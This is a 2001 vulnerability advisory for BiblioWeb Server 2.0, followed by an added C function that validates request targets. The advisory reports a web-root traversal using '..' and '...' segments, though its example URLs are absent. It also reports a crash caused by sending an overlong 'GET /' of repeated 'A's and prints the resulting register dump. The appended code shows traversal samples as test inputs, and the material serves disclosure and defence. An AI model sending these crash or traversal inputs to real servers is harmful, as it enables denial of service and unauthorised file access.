Date: Mon Feb 05 2001 - 14:40:22 CST
To Ben Greenbaum:
Please post this advisory instead of the last. I needed to
make a minor change to the 'Vendor Status' section. Thanks.
Vulnerabilities in BiblioWeb Server
BiblioWeb Server 2.0 is a web server available from
http://www.biblioscape.com. A vulnerability exists which allows a remote
user to break out of the web root using relative paths (i.e., '..', '...').
A second vulnerability allows a remote attacker to crash the server.
To break out of the web root, use the following URLs:
To crash the server, telnet to port 80, and send:
GET /[a lot of 'A's]
The server crashes with the following dump:
BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
No quick fix is possible.
CG Information was contacted via <supportbiblioscape.com> on Monday,
January 29, 2001. No reply was received.
- Joe Testa ( e-mail: joetestahushmail.com / AIM: LordSpankatron
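A server-side request-target check covering both issues described in the advisory above (dot-only path segments such as '..' and '...', and an overlong GET), as an added example that is not BiblioWeb's code or the advisory author's. The names `check_request_target` and `MAX_TARGET_LEN`, the limit value and the return codes are hypothetical, and the input is assumed to be already percent-decoded.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_TARGET_LEN 1024 /* assumed limit, not a value from the advisory */

/* True if the segment is two or more dots and nothing else ("..", "...").
   Windows 9x-era path handling treats "..." as two levels up, so checking
   for ".." alone is not enough. */
static int is_dot_run(const char *s, size_t n) {
    size_t i;
    if (n < 2) return 0;
    for (i = 0; i < n; i++)
        if (s[i] != '.') return 0;
    return 1;
}

/* Validate a percent-decoded request target before it is copied or opened.
   Returns 0 = acceptable, -1 = too long, -2 = traversal segment,
   -3 = malformed (empty or not starting with '/'). */
int check_request_target(const char *target, size_t len) {
    size_t i, start = 1;
    if (len > MAX_TARGET_LEN) return -1;      /* reject before any copy */
    if (len == 0 || target[0] != '/') return -3;
    for (i = 1; i <= len; i++) {
        /* Both separators count: Windows accepts '\' as well as '/'. */
        if (i == len || target[i] == '/' || target[i] == '\\') {
            if (is_dot_run(target + start, i - start)) return -2;
            start = i + 1;
        }
    }
    return 0;
}

int main(void) {
    /* Constructed sample targets, not taken from the advisory. */
    const char *samples[] = { "/index.html", "/../x", "/.../x",
                              "/a\\..\\b", "/file..txt" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s -> %d\n", samples[i],
               check_request_target(samples[i], strlen(samples[i])));
    return 0;
}
```

The check runs on the length-delimited target, so the length test happens before the string is copied into any fixed-size buffer.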